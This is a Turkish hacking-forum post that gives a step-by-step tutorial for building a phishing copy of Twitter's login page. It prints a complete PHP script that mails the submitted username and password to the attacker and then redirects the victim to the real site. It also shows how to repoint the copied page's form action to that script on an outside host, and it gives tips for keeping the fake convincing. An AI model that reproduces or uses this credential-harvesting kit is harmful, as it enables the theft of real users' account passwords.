THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Post Adresi Olmadan Fake Yapımı

ERTYU - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2009
Mesajlar:
186
Konular:
45
Teşekkür (Etti):
1
Teşekkür (Aldı):
12
Ticaret:
(0) %
31-03-2013 20:55
#1
Post Adresi Olmadan Fake Yapımı
En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum

1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz

Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.

1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve
PHP- Kodu:
<?php
$kime="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[’User1’]."\\r\\n"."şifre : ".$_POST[’pass1’]."\\r\\n";
echo ’**********window.********.href = "’ . $yonlendir . ’";</script>’;
mail($kime, $baslik, $Crim)
?>


Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz

2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz

3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.

4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn=
PHP- Kodu:


<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post">


gibi

5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.

Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler